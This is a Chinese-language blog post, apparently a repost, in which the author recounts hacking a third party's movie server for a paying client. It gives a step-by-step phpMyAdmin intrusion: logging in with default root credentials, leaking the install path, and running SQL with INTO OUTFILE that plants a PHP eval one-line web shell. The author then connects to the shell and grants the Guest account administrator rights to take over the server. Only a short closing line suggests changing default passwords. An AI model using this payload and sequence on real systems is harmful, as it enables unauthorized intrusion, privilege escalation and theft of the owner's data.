1. 程式人生 > >關於PHPMYADMIN的入侵提權拿伺服器

關於PHPMYADMIN的入侵提權拿伺服器

1.今天收到客戶一個單子,說是要黑一臺電影伺服器,然後給了我IP 61.147.*.*

開啟網站一看,發現是用FLEAPHP寫的一個程式

因為剛好在研究FLEAPHP開源開發系統,大致瞭解一些語法,可是沒有能利用的,而且整個伺服器也只有這麼一個網站

2.FleaPHP 為開發者輕鬆、快捷的建立應用程式提供幫助。FleaPHP 框架簡單、清晰,容易理解和學習,並且有完全中文化的文件和豐富的示

例程式降低學習成本。
使用 FleaPHP 框架開發的應用程式能夠自動適應各種執行環境,併兼容 PHP4 和 PHP5。


3.既然是PHP那肯定有PHPMYADMIN,嘗試著在網站地址後 加入 61.147.*.*/phpmyadmin

哈哈,能直接開啟,這時候,就差使用者名稱和密碼了

因為事先在看網站的時候,我直接在網站地址後加了個 61.147.*.*/ROOT

沒想到能檢視他的目錄,所以,我在 PHPMYADMIN裡面就用預設使用者

ROOT ROOT

成功登陸

發現他有三個資料庫。。這時候就要利用到 PHPMYADMIN的入侵了

4.首先 開啟phpmyadmin

就是在PHPMYADMIN後面加 libraries/select_lang.lib.php

得到他的路徑 C:APMhtdocsphpMyAdminlibraries

這個一定要記錄下來

然後 進入PHPMYADMIN

用預設使用者進去

執行 SQL語句

Create TABLE a (cmd text NOT NULL);
Insert INTO a (cmd) VALUES("<?php eval($_POST[1]);?>");
select cmd from a into outfile "C:/APM/htdocs/phpMyAdmin/libraries/d.php";
Drop TABLE IF EXISTS a;


語句詳細意思

建立一個A表 寫入 <?php eval($_POST[1]);?>
熟悉這個的都知道 <?php eval($_POST[1]);?>這個就是一句話了

1是密碼 可以自行修改

把裡面的資訊輸出到 phpMyAdmin/libraries/d.php
這個檔案

d.php 名字也可以自己入

Drop TABLE IF EXISTS a   如果有 A表 將刪除


然後執行

OK 寫入成功

這個時候用一句話連線

傳上SHELL

進去 一查 原來是個WIN系統

開啟GUEST 給予管理許可權

伺服器成功到手

1.5T的電影 呵呵


此方法一是爆出了路徑 二是管理員大意 沒有修改預設密碼

所以

漏洞詳細解決方法:
就是修改管理員密碼

這樣 可以阻止黑客進入PHPMYADMIN進行SQL執行

當然 IDC商也要禁止客戶商的一些許可權

這樣就可以保證了